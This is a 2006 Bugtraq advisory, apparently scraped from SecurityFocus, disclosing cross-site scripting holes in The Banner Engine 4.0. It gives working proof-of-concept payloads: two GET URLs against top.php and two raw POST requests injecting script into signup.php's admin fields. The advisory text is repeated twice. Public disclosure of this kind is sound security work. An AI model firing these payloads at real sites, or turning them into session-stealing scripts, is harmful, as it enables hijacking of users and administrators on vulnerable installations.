Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
TBE 4.0 XSS
Jul 03 2006 06:58PM
securityconnection gmail com
The Banner Engine - tbe4.0
Native Solutions
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/top.php?action=search&catid=catid&text=%3Cscript%3Ealer
t(%22Ellipsis+Security+Test%22)%3C/script%3E
http://target.xx/top.php?action=search&catid=catid&text=%3Cimg%20src=%22
javascript:alert('Ellipsis+Security+Test');%22%3E
---
POST http://target.xx:80/signup.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 127
adminpass="><script>alert(/Ellipsis+Security+Test/)</script>&adminlogin=
1&action=1&login=1&password=1&bid=1&bnumr=1
---
POST http://target.xx:80/signup.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 127
adminpass=1&adminlogin="><script>alert(/Ellipsis+Security+Test/)</script
>&action=1&login=1&password=1&bid=1&bnumr=1
-----------------
Ellipsis Security
http://ellsec.org
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Native Solutions
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/top.php?action=search&catid=catid&text=%3Cscript%3Ealer
t(%22Ellipsis+Security+Test%22)%3C/script%3E
http://target.xx/top.php?action=search&catid=catid&text=%3Cimg%20src=%22
javascript:alert('Ellipsis+Security+Test');%22%3E
---
POST http://target.xx:80/signup.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 127
adminpass="><script>alert(/Ellipsis+Security+Test/)</script>&adminlogin=
1&action=1&login=1&password=1&bid=1&bnumr=1
---
POST http://target.xx:80/signup.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 127
adminpass=1&adminlogin="><script>alert(/Ellipsis+Security+Test/)</script
>&action=1&login=1&password=1&bid=1&bnumr=1
-----------------
Ellipsis Security
http://ellsec.org
[ reply ]